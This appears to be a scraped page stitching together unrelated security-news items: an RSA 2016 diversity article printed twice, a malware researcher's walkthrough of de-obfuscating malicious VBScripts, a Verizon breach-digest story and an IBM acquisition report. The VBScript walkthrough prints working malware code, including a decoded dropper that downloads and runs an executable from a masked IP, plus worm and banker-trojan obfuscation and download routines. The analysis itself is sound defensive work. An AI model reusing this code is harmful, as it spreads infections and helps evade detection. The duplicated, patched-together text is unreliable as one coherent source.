To Improve Workforce Diversity, Widen The Search, Feed Infosec Talent Pipeline

RSA Conference 2016: Session panelists offered practical tips on how to attract more women and minorities, and challenged attendees to do some soul-searching.

SAN FRANCISCO, RSA Conference, Monday Feb. 29 — Overlapping themes arose today in sessions about improving the cybersecurity workforce’s ethnic and gender diversity, at the RSA Conference.

Panelists for “Bridging the Great Minority Cyber Divide–Social and Cultural Dynamics” and “Should I Stay or Should I Go? How to Attract/Retain Women in the Industry” gave some similar advice to attendees on how to improve diversity within their own infosec teams and within the industry at large.

[embedded content]

From a practical standpoint, panelists spoke of the importance of widening the applicant pool of qualified job applicants and supporting a more robust pipline of young talent — from elementary school, straight through college, without losing them. They also spoke more deeply, about looking inward to recognize one’s own biases and the uncomfortable role of being “the only one in the room,” (as in the only minority person, or the only woman).

“That feeling of being the only one in the room is very real,” said Yonesy Núñez, moderator of the Bridging the Minority Cyber Divide session and membership programs co-chair of the International Consortium of Minority Cybersecurity Professionals.

Núñez asked the panelists whether corporate “inclusion” efforts were effective. Panelist Devon Bryan, vice president and Global CISO of ADP LLC said that the business case for diversity has definitely been made, and focused on the importance — now — of improving the diversity of the talent pipeline. Yet, panelist Cecily Joseph, vice president of corporate responsibility and chief diversity officer for Symantec, said “In a lot of cases, the business case [for workforce diversity] really hasn’t been made … I would shudder to think where we’d be if those [inclusion] programs didn’t exist.”

One of the troubles Joseph and other panelists throughout the day said they face is that the argument used against diversity initiatives is “but we want the best candidates.”

“Yes, we all want the best candidates,” says Joseph, “but broaden the pool.” She suggests actively recruiting women and people of color, by going to them instead of waiting for them to find you through the same old channels.

Panelist Kevin McKenzie, CISO of Clemson University, also suggested a general rule for meeting more qualified applicants was to move items out of “required skills” into “preferred skills,” on the job description so they wouldn’t be so quickly rejected by the HR vetting process.

Kerry Matre, a member of the women in security panel, and Hewlett Packard Enterprise’s security services team, suggested using some resources from the National Center for Women and Information Technology, like their tips for conducting inclusive searches for job candidates and their “Male Allies and Advocates Toolkit.”  

“Be an advocate,” Matre suggests. “If you see someone say something inappropriate, immediately say [so],” instead of waiting to comment about it later.

Matre said that although she has never left a job because of a gender or diversity issue, there are times she has come home from an industry conference feeling ready to leave cybersecurity because of interactions that happened there. With that in mind, she challenged the audience to practice being an advocate right away. “I guarantee you, you will hear something inappropriate between now and the time you go to sleep tonight.”

Panelist Ping Look, director of security for Optiv, also referenced the inappropriate behavior of men towards her at industry events, particularly early in her career. Other women asked her why she stayed in the cybersecurity industry, enduring that behavior. “I kind of wanted to stay because I was the only woman” Someone has to be first, she said, and if she stayed, she knew other women would come.

When asked about how to retain the women on your team, Gurdeep Kaur, chief security architect at AIG, and panelist on the “Should I Stay or Should I Go” panel recommended, “Don’t treat me differently” for being a woman; just an individual. She also suggests to men having trouble engaging their female coworkers: “Don’t rule her out. It might not be that she doesn’t have things to say, but she doesn’t know how to break into that boy’s club.”

Panel moderator and ISC2 director of business development Elise Yacobellis recommended to the women in the audience, “Be your authentic self,” and not just try to fit into the “boy’s club.”

Matre said that people need to talk more about diversity within their organizations every day, so it becomes a normal conversation, instead of an awkward workshop from time to time. Joseph said diversity needs to be part of the entire business; not just during hiring, but during procurement, philanthropy, and more.

Panelist on the “Should I Stay Or Should I Go Panel” Angela Messer, executive vice-president at Booz Allen Hamilton, said, “We all have our own biases. Take a step back and ask ‘Am I giving people opportunities to grow’ … and if not, why not?”

Interop 2016 Las VegasFind out more about security threats at Interop 2016, May 2-6, at the Mandalay Bay Convention Center, Las Vegas. Register today and receive an early bird discount of $200.

Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad … View Full Bio

More Insights

To Improve Diversity In InfoSec Workforce, Widen The Search, Feed Talent Pipeline

RSA Conference 2016: To attract more women and minorities to the cybersecurity workforce, session panelists gave attendees some practical tips and challenged them to do some soul-searching.

SAN FRANCISCO, RSA Conference, Monday Feb. 29 — Overlapping themes arose today in sessions about improving the cybersecurity workforce’s ethnic and gender diversity, at the RSA Conference.

Panelists for “Bridging the Great Minority Cyber Divide–Social and Cultural Dynamics” and “Should I Stay or Should I Go? How to Attract/Retain Women in the Industry” gave some similar advice to attendees on how to improve diversity within their own infosec teams and within the industry at large.

[embedded content]

From a practical standpoint, panelists spoke of the importance of widening the applicant pool from which they search for qualified job applicants and supporting a more robust pipline of young talent, from elementary school, straight through college, without losing them. They also spoke more deeply, about looking inward to recognize one’s own biases and the uncomfortable role of being “the only one in the room,” (as in the only minority person, or the only woman).

“That feeling of being the only one in the room is very real,” said Yonesy Núñez, moderator of the Bridging the Minority Cyber Divide session and membership programs co-chair of the International Consortium of Minority Cybersecurity Professionals.

Núñez asked the panelists whether corporate “inclusion” efforts were effective Panelist Devon Bryan, vice president and Global CISO of ADP LLC said that the business case for diversity has definitely been made, now, and focused on the importance of improving the diversity of the talent pipeline. Yet, panelist Cecily Joseph, vice president of corporate responsibility and chief diversity officer for Symantec, said “In a lot of cases, the business case [for workforce diversity] really hasn’t been made … I would shudder to think where we’d be if those [inclusion] programs didn’t exist.”

One of the troubles Joseph and other panelists throughout the day said they face is that the argument used against diversity initiatives is “but we want the best candidates.”

“Yes, we all want the best candidates,” says Joseph, “but broaden the pool.” She suggests actively recruiting women and people of color, by going to them instead of waiting for them to find you through the same old channels.

Panelist Kevin McKenzie, CISO of Clemson University, also suggested a general rule for meeting more qualified applicants was to move items out of “required skills” into “preferred skills,” on the job description so they wouldn’t be so quickly rejected by the HR vetting process.

Kerry Matre, a member of the women in security panel, and Hewlett Packard Enterprise’s security services team, suggested using some resources from the National Center for Women and Information Technology, like their tips for conducting inclusive searches for job candidates and their “Male Allies and Advocates Toolkit.”  

“Be an advocate,” Matre suggests. “If you see someone say something inappropriate, immediately say [so],” instead of waiting to comment about it later.

Matre said that although she has never left a job because of a gender or diversity issue, there are times she has come home from an industry conference feeling ready to leave cybersecurity because of interactions that happened there. With that in mind, she challenged the audience to practice being an advocate right away. “I guarantee you, you will hear something inappropriate between now and the time you go to sleep tonight.”

Panelist Ping Look, director of security for Optiv, also referenced the inappropriate behavior of men towards her at industry events, particularly early in her career. Other women asked her why she stayed in the cybersecurity industry, enduring that behavior. “I kind of wanted to stay because I was the only woman” Someone has to be first, she said, and if she stayed, she knew other women would come.

When asked about how to retain the women on your team, Gurdeep Kaur, chief security architect at AIG, and panelist on the “Should I Stay or Should I Go” panel recommended, “Don’t treat me differently” for being a woman; just an individual. She also suggests to men having trouble engaging their female coworkers: “Don’t rule her out. It might not be that she doesn’t have things to say, but she doesn’t know how to break into that boy’s club.”

Panel moderator and ISC2 director of business development Elise Yacobellis recommended to the women in the audience, “Be your authentic self,” and not just try to fit into the “boy’s club.”

Matre said that people need to talk more about diversity within their organizations every day, so it becomes a normal conversation, instead of an awkward workshop from time to time. Joseph said diversity needs to be part of the entire business; not just during hiring, but during procurement, philanthropy, and more.

Panelist on the “Should I Stay Or Should I Go Panel” Angela Messer, executive vice-president at Booz Allen Hamilton, said, “We all have our own biases. Take a step back and ask ‘Am I giving people opportunities to grow’ … and if not, why not?”

Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad … View Full Bio

More Insights

De-obfuscating malicious Vbscripts

Although they were never really gone, it looks like there is a rise in the number of malicious vbscripts in the wild. Maybe the similarity to VBA scripts and possible use in macros is responsible for the increased popularity. Let’s have a quick look at a few of them.

First some background

VBScript has been installed with every desktop version of Windows since Windows 98 and is based on the Visual Basic programming language. So, the advantages are that it is a reasonably straightforward language to use and the scripts will run on almost any Windows computer. The language being easy to interpret is also a bit of a problem for malware authors as researchers have no problems interpreting what they are up to. So some of them have tried some obfuscation methods to make it harder for researchers.

We will have a look at some examples. Starting with an easy one and working our way up.

Example 1

This one has the filename TEMPcoral.vbs and it peeked my interest as it was often found on systems that were heavily infected. Being one of the first to arrive on such systems it looked as if was the start of a series of infections that we call Yelloader. Mostly Trojan.Droppers and Trojan.Clickers. You can find some examples in this removal guide. There are several versions of TEMPcoral.vbs but one of them was indeed responsible for downloading and running a Trojan.Dropper that lead to the rest of the infections.

This is a part of the obfuscated code:

dim all
all=Chr(83)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(119)+Chr(111)+Chr(115)+Chr(104)+Chr(105)+Chr(115)+Chr(104)+Chr(105)+Chr(32)+Chr(61)+Chr(32)+Chr(67)+Chr(114)+Chr(101)+Chr(97)+Chr(116)+Chr(101)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116)+Chr(40)+Chr(34)+Chr(77)+Chr(105)+Chr(99)+ <em>etc </em>
Execute(all) 

The author simply replaced every character in the script with its character code. De-obfuscating straightforward scripts like this is as easy as changing “execute” into “wscript.echo” and you can look at the code.

dim all

all=Set shawoshishi = CreateObject("Micros"+"oft.XMLH""TTP"):Set yunxingqilaiba = CreateObject("Wsc""rip""t.Shell"):shawoshishi.Open "GET","http://xxx.xxx.xxx.xxx/~pchomee/dom/setup.exe",0:shawoshishi.setRequestHeader "If-Modified-Since",0:shawoshishi.Send():Set shishijiushishi = CreateObject("ADODB.Stream"):shishijiushishi.Mode = 3:shishijiushishi.Type = 1:shishijiushishi.Open():shishijiushishi.Write(shawoshishi.responseBody):dim conststr:conststr="abcdefghijklmnopqrstuvwxyz":dim i,rtime:rtime="":For i=0 To 4:Randomize:rtime=rtime&Mid(conststr,Int(Rnd()*Len(conststr))1,1):Next:Set env=yunxingqilaiba.Environment("Process"):temppath=env.Item("TEMP"):path=temppath&""&rtime&".exe":shishijiushishi.SaveToFile path,2:path=path&" -install":wscript.sleep(1000):s="yunxing""qilaiba.R""un(path)":Execute(s)

Execute(all)

I x-rated the IP but for those interested this is the setup.exe that will be downloaded

 

The next example called Bare Bones BTC $.vbs  was a bit more complicated, but de-obfuscating it was more or less just as simple. We detect it as Worm.Jenxcus.Script. This one overwrites all vbs files on a system with copies of itself and tries to steal bitcoin keys.

dim Bny_Slom

Bny_Slom = "42#63#94#35#117#104#102#114#103#104#117#35#61#35#107#114#120#103#108#113#108#35#43#102#44#35#118#110#124#115#104#35#61#35#107#114#120#103#108#113#108#48#105#123#35#96#<em>etc</em>
.
.
.
.
Suleiman = ""
For Each Salem In Split(Bny_Slom, "#")
Suleiman = Suleiman & Chr(Salem - 3)
Next
dim i
i = 1
do until i = 10
Execute Suleiman
loop

The first de-obfuscated part of the script looks like this.

worm

I removed the Skype handle of the malware author and part of the host-name

 

And to show you that it’s not always that easy we will have a look at some parts of a file called Curriculum_vitae_Suzana_p.vbs that turned out to be a Banker.Trojan Downloader.

This one uses a lot of functions. One of them was written to obfuscate a lot of other parts of the code.

Below is the obfuscated code in this function:

function RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu(cdguuaFZj)
Dim IVtfgpHgZVTWSQzHZNClG
Dim GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT
Dim PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm
Dim jNdOjYXVIVKyQAEpJhb
Dim MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE
Dim WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ
Dim nnzVOsFZXdNgBVgD
Dim dbjsiqCAm
IVtfgpHgZVTWSQzHZNClG           = Len(Cstr(22-21)) - (26-25)
GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT  = IVtfgpHgZVTWSQzHZNClG
PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm          = CLng("&h" & Mid(cdguuaFZj, (26-25), (10-8)))
jNdOjYXVIVKyQAEpJhb   = (10-8) + (12-11)
do
 MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE = CLng("&h" & Mid(cdguuaFZj, jNdOjYXVIVKyQAEpJhb, (10-8)))
 If (GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT < IVtfgpHgZVTWSQzHZNClG) Then
  GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT = GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT + (16-15)
 Else
  GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT = (16-15)
 End If
 WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ = MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE Xor Asc(Mid(Cstr((6-5)),GVzLgGNldeoXjIcFeYupnCmUlJmAOsCnaNyvOT,(46-45)))
 if (WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ <= PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm) Then
  WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ = 25 + 25 + 25 + 25 + 25 + 25 + 25 + 25 + 25 + 25 + 5  + WXU  BseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ - PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm
 Else
  WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ = WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ - PYAma  mUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm
 End If
 nnzVOsFZXdNgBVgD       = nnzVOsFZXdNgBVgD & chr(WXUBseoHyINpfIeSLLSHWUOcoOJkBVyMRDaBQgovlyJpqVmUnQ)
 PYAmamUdUkjJwQYlMIYmhWurAivLdRDTblkakrvhTJPBhhm          = MKqIrXmPKUijaorATJRQYACWSnJanKRbckEXXUkE
 jNdOjYXVIVKyQAEpJhb   = jNdOjYXVIVKyQAEpJhb + (10-8)
loop until (jNdOjYXVIVKyQAEpJhb >= len(cdguuaFZj))
RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu = nnzVOsFZXdNgBVgD
end function

Giving the variables meaningful names and solving the calculations makes this function a lot friendlier to look at:

function FunctionDecrypt1(input)
Dim Integer1
Dim Integer2
Dim Long1
Dim Integer3
Dim Long2
Dim Long3
Dim String1
Integer1              = 0
Integer2              = Integer1
Long1    = CLng("&h" & Mid(input, (1), (2)))
Integer3              = 3
do
 Long2 = CLng("&h" & Mid(input, Integer3, 2))
 If (Integer2 < Integer1) Then
  Integer2 = Integer2 + 1
 Else
  Integer2 = 1
 End If
 Long3 = Long2 Xor Asc(Mid(Cstr((1)),Integer2,(1)))
 if (Long3 <= Long1) Then
  Long3 = 255  + Long3 - Long1
 Else
  Long3 = Long3 - Long1
 End If
 String1  = String1 & chr(Long3)
 Long1    = Long2
 Integer3              = Integer3 + (2)
loop until (Integer3 >= len(input))
FunctionDecrypt1 = String1
end function

As an example of how this function was used in other parts of the script we can have a look at the section where the script downloads a file and writes that to a location on the infected system.

This is the before:

function YMGdwSKMICYDqMeUVeZQJrylhKndIYzbUDNvOOqFRXcHVpiic(BOUhcBXabUipFqVjyrEHaeWQHnUsAerb,qjMdnLJlsdGPJnXw)
On Error Resume Next
Set mPnrPkNOJASpwppobITDRCBz = CreateObject(RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("DB185A83E11F60BF2947A2DB016485"))
mPnrPkNOJASpwppobITDRCBz.open RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("186E82E7"),  BOUhcBXabUipFqVjyrEHaeWQHnUsAerb, false
mPnrPkNOJASpwppobITDRCBz.send()
IpsflGFZyCjOdhdksrqaMWUaqll = (mPnrPkNOJASpwppobITDRCBz.Status = (((1 + 1 + 1) * (50 + 10)) + (10 + 10)))
If IpsflGFZyCjOdhdksrqaMWUaqll Then
Set okYHoYEauCTLLmt = CreateObject(RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("58A8DD1C51A2E104498ADE71EF"))
okYHoYEauCTLLmt.Open
okYHoYEauCTLLmt.Type = 1
okYHoYEauCTLLmt.Write mPnrPkNOJASpwppobITDRCBz.ResponseBody
okYHoYEauCTLLmt.Position = 0
Set RvcTWPRHvSwoOYfHLbVIFYJWGFyXCGVawFkM = Createobject(RYmQPDQqUWPOrHMrDEBfFOjvggzFCbnLksZowYuYwNAKeXu("B73AAC2EA626AB24A33A59AE29A43BBF084A8FC50260F36FE578DD"))
If RvcTWPRHvSwoOYfHLbVIFYJWGFyXCGVawFkM.Fileexists(qjMdnLJlsdGPJnXw) Then
RvcTWPRHvSwoOYfHLbVIFYJWGFyXCGVawFkM.DeleteFile  qjMdnLJlsdGPJnXw
End If
okYHoYEauCTLLmt.SaveToFile qjMdnLJlsdGPJnXw
okYHoYEauCTLLmt.Close
Set okYHoYEauCTLLmt = Nothing
End if
Set mPnrPkNOJASpwppobITDRCBz = Nothing
end function

After some renaming and using the function we figured out earlier, this is the after.

function DownloadToFile(url1,StringPathToFile)
On Error Resume Next
Set httpObject = CreateObject(MSXML2.XMLHTTP)
httpObject.open GET,  url1, false
httpObject.send()
LongStatusBooleanBoolean = (httpObject.Status = (200))
If LongStatusBooleanBoolean Then
 Set objectStream = CreateObject(ADODB.Stream)
 objectStream.Open
 objectStream.Type = 1
 objectStream.Write httpObject.ResponseBody
 objectStream.Position = 0
 Set Object1 = Createobject(Scripting.FileSystemObject)
 If Object1.Fileexists(StringPathToFile) Then
  Object1.DeleteFile  StringPathToFile
 End If
 objectStream.SaveToFile StringPathToFile
 objectStream.Close
 Set objectStream = Nothing
End if
Set httpObject = Nothing
end function

Even though the malware author in this case was friendly enough to insert comments about the use of some functions (in Portuguese) this one took me a lot more time to de-obfuscate as the other two. Most of all because the use of functions makes the script a lot less straightforward. I had to find and figure out the “DecryptFunction” first before I could make any sense of the rest.

Delivery

Vbscripts can arrive on your system in different ways where drive-by downloads (think malvertising).  There are also many methods that infect word and excel documents. Due to the close relationship between VBA and VBScript and the fact that the Office document types are usually allowed as attachments, contrary to executables, this method is likely to stay in use.

Recommendations

If you don’t need to run scripts, consider disabling Windows Script Host. Also do not enable macros unless you are positively sure that you can trust and actually need to do so to use the document at hand. If possible contact the sender/creator and ask about the necessity.

Summary

With the returned popularity of visual basic as a first attack vector in mind, we took a look at de-obfuscating a few recent vbs files starting with a very easy one and progressing to a lot more complex script.

Special thanks to my online friends that helped me find samples: Oh My!, tetonbob and blender.

Pieter Arntz


Pirates, Ships, And A Hacked CMS: Inside Verizon’s Breach Investigations

New Verizon Data Breach Digest report shares in-the-trenches scenarios of actual cyberattack investigations by the company’s RISK team.

SAN FRANCISCO, CALIF. – RSA Conference 2016 – Pirates used hacked information from a global shipping company’s servers to target and capture cargo ships on the high seas, and a water utility’s valves and ducts were hijacked: these are some of the more dramatic scenarios representing cases Verizon’s breach team investigated in the past year.

Armed pirates for several months had been strategically attacking ships in their travels on the sea, also armed with bill of lading information pilfered via a Web-borne attack on the company’s content management system (CMS). The pirates would storm the ship, corral the crew, and locate specific cargo containers by searching for specific bar codes and steal the contents. Then they’d disembark and move on to their next target ship.

Verizon investigators discovered that the bad guys initially had uploaded a malicious Web shell to the shipping company’s CMS server, which manages shipping inventory and bills of lading for its ships.  “The threat actors used an insecure upload script to upload the web shell and then directly call it as this directory was web accessible and had execute permissions set on it—no Local File Inclusion (LFI) or Remote File Inclusion (RFI) required,” according to a new Verizon report to be published tomorrow.

“Essentially, this allowed the threat actors to interact with the webserver and perform actions such as uploading and downloading data, as well as running various commands. It allowed the threat actors to pull down bills of lading for future shipments and identify sought-after crates and the vessels scheduled to carry them.”

That’s just one page-turner in Verizon’s new Data Breach Digest report. The investigations documented in its report are all drawn from real cases the team handled, but Verizon says it employed some “creative license” to protect the anonymity of its customers, with fictional names, locations, and breach sizes, in some cases, for example.

“The majority of them were in 2015 … But it’s not a sort of trending report,” says Marc Spitler, senior manager of Verizon security research. “It’s more of a popcorn piece to sit back and read and take a look at some things we have responded to, from the mindset and point of view of a forensics investigator.”

The pirate attack scenario is based on a real case, but of course this is not the usual pirate story associated with technology (think software piracy). The case demonstrates how hackers increasingly are going after CMSes, according to Spitler. “We are starting to see that [CMS attacks] more and more,” he says.

“The majority of cases we respond to are more along the lines of Web apps” attacks, he says. “I’m not saying you have to worry about pirates, but you do need to worry about CMS plug-ins in your apps being targeted quite a bit by the adversary.”

The report also describes a “water” utility that was experiencing mysterious and unexplained manipulation of its PLCs that controlled the water treatment process as well as the flow. Spitler says he wasn’t privy to that particular case, but it was indeed a critical infrastructure operation’s control system that was exploited.

“I’m happy to say we’re not responding to this” type of attack every day, he says.

In a nutshell, the attackers stole credentials on the utility’s payment app Web server to access the valve and control system application, all of which ran on older IBM AS400 computer systems. “During these connections, the threat actors modified application settings with little apparent knowledge of how the flow control system worked,” the report says. An alert system allowed the utility to spot the anomaly and correct the controls, according to the report.

As for Verizon’s wildly popular Data Breach Investigations Report (DBIR) due this spring that focuses on trends among actual data breaches the company has worked on, Spitler says it will be more of the same in many of the underlying issues. “You’re going to see strong relationships to the classification patterns featured in last year’s DBIR,” he says.

The DBD illustrates the prevalence of phishing as a first vector of attack, and credentials reuse as a weak link, for example, he says. “Tried and true things” still dominate, he says.

“Nobody wants to be the victim of a breach or to live through one of these war stories,” Spitler says. “We have to be very realistic and understanding that it’s certainly a possibility no matter what you do, how well-intended your security processes and procedures were.”

Some of the cases Verizon investigated were hampered by “blocks or potholes” in the victim organization’s processes or lack of incident response preparation that impaired a rapid and smooth investigation, he says.

“It’s important for an organization to understand how it can prepare for somebody internally or externally to do a forensics investigation,” he says. 

Interop 2016 Las VegasFind out more about security threats at Interop 2016, May 2-6, at the Mandalay Bay Convention Center, Las Vegas. Register today and receive an early bird discount of $200.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

More Insights

IBM To Buy Resilient Systems In Bid To Build Incident Response Capabilities

Company has also launched a new incident response service and entered into a partnership with Carbon Black.

IBM Monday announced plans to acquire incident response provider Resilient Systems for an undisclosed sum and launch a new incident response service as part of a broader effort to boost its capabilities in the fast growing market for such capabilities.

IBM also announced a partnership with endpoint security provider Carbon Black under which IBM will use the latter’s incident protection and response technologies to deliver remote incident response services to enterprise customers.

The acquisition and partnership are part of an IBM effort to build services for responding to security incidents in a timely, organized and coordinated manner, Caleb Barlow, vice president of IBM Security, said in comments to Dark Reading. IBM customers are increasingly demanding such capabilities, he says.

Resilient Systems offers a response management platform that is designed to let security teams automate response processes and resolve security incidents more effectively. The company describes its technology as enabling organizations to develop dynamic action pans for nearly 20 different incident scenarios from malware and denial of service attacks to lost devices.

Resilient’s platform is designed to walk enterprise security teams through the incident response process and supports comprehensive analytics, dashboards and reporting features. With headquarters in Cambridge, MA, Resilient employs around 100 people and claims numerous customers among Fortune 500 companies as well as small and mid sized businesses in the financial services, healthcare, retail and government sectors.

Once the acquisition is finalized, Resilient’s Incident Response Platform will complement IBM’s existing QRadar security intelligence platform to create a comprehensive security operations and response capability, Barlow says. IBM’s new X-Force Incident Response Services will be based on iResilient Systems’ as well as IBM’s existing QRadar security incident and event management (SIEM) platform.

“It will also include remote incident response capabilities via our technology partnership with Carbon Black,” Barlow said. Carbon Black’s technology will enable IBM security analysts to conduct forensics on compromised endpoint devices, determine where a breach first occurred, map it across other devices, contain it quickly, and shut it down, Barlow says.

The Resilient purchase gives IBM a way to unite the technical and business aspects of incident response said David Monahan, an analyst with Enterprise Management Associates in an analyst note. With the acquisition, IBM will have a comprehensive set of capabilities ranging from incident detection and forensics to analysis, remediation, process management, resource coordination and communications, he said.

The dramatic rise in mega security breaches in recent times has heightened the need for organizations to have capabilities for quickly detecting and mitigating security incidents. Numerous recent studies and surveys have shown that one of the biggest challenges enterprises face these days is in knowing when they have had a security incident and then having a process for responding to and mitigating it.

“Organizations of all sizes can no longer afford to under-service or ignore incident response,” Monahan said. “IR must move beyond a loose semblance of scattered, incomplete, outdated, and untested documentation to an actual programmatic collection of documentation and tools.”

In a study of 600 organizations conducted last year by the Ponemon Institute, 75 percent said they were not prepared to deal with a security incident. Only 30 percent had a formal incident response plan in place while an even smaller 17 percent had an incident response plan that was applied consistently across the enterprise.

Related Content:

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

More Insights